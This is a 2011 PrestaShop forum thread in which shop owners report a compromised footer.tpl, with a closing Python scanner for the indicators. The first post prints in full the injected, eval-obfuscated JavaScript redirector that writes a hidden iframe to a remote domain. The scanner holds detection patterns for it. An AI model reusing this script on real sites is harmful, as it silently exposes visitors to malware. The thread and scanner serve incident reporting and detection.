Slava
Posted August 23, 2011

Hi! I have got a question about some code lines which I found in my footer.tpl file. It's located just before the </body> tag and looks like this:

{literal}<script>String.prototype.asd=function(){return String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v[i].length+1;o*=2;e=eval;m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o,];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);</script>{/literal}

I'm surprised because it's generating a small dot on the next line under the footer (screenshot attached below) and a red antivirus alert that it is Trojan.JS.Redirector.py. The Firebug inspection is also attached as a jpg. It looks very strange, especially the iframes with http addresses.

The next thing, which may be related to the previous one, is a strange PHP file found in /prestashop/download named something like 67f4af42e1aec400c40b8ca1abfb259a.php, and the directory smarty_v2 in prestashop/tools magically disappeared.

Where did it come from on my website? It looks like code injection. Is this a flaw in the store software? I am very worried about the functioning of the store and customer data. Also, antivirus warnings do not inspire confidence.

For safety purposes, I removed this piece of code from footer.tpl and it seems to be OK. But what if it happens again?!

Thanks for suggestions. Regards.

PrestaShop 1.4.3, standard modules

geckoinfo
Posted August 23, 2011

Same thing for me... Same code in footer.tpl, same strange PHP file found in /download, smarty_v2 disappeared...

I removed this code from footer.tpl and I'm looking for a solution.

PrestaShop 1.4.3 too

Mike Kranzler
Posted August 23, 2011

Hi everybody,

We're consolidating the discussion on this topic to one thread, which you can find here: http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/

I am going to close this thread to limit confusion, but we are working very hard to identify the source of this issue and close it off. I'm hoping to have news for all of you soon.

-Mike
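
The two indicators reported in this thread (an obfuscated inline script in a .tpl file and a hex-named .php file) can be checked for mechanically. The Python scanner below is an added example, not code from the posters or from PrestaShop; its rule names, the thresholds and the SAMPLE_TPL string are assumptions constructed for illustration from the traits described in the posts above.

```python
import os
import re
import sys

# Traits of the script quoted in the first post; matched only inside <script>.
TEMPLATE_RULES = {
    "fromCharCode": re.compile(r"fromCharCode"),
    "eval_alias": re.compile(r"\b\w+\s*=\s*eval\b"),
    "long_numeric_array": re.compile(r"\[(?:\s*\d+(?:\s*-\s*\w+)?\s*,){20,}"),
}
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# 32 hex characters plus .php, like the file reported in /download.
HEX_PHP = re.compile(r"^[0-9a-f]{32}\.php$", re.I)
# Constructed sample (not the script from the post): same shape, harmless values.
SAMPLE_TPL = ("{literal}<script>e=eval;m=[" + "".join(f"{n}-o," for n in range(40, 70))
              + "];mm=String.fromCharCode;</script>{/literal}")

def scan_template(text):
    """Return the sorted rule names matched inside inline <script> blocks."""
    hits = set()
    for body in SCRIPT_BLOCK.findall(text):
        hits.update(n for n, rx in TEMPLATE_RULES.items() if rx.search(body))
    return sorted(hits)

def suspicious_php(filenames):
    """Return the file names that look like a hash-named PHP drop."""
    return [f for f in filenames if HEX_PHP.match(f)]

def scan_shop(root):
    """Walk a shop directory and return (path, finding) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in suspicious_php(files):
            findings.append((os.path.join(dirpath, name), "hex-named .php"))
        for name in (f for f in files if f.endswith(".tpl")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                rules = scan_template(fh.read())
            if len(rules) >= 2:  # a single trait alone is too noisy
                findings.append((path, "+".join(rules)))
    return findings

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, finding in scan_shop(sys.argv[1]):
            print(f"{finding}\t{path}")
    else:
        print(scan_template(SAMPLE_TPL))
```

Run it with the shop's root directory as the only argument; a hit is a reason to inspect the file, not proof of compromise.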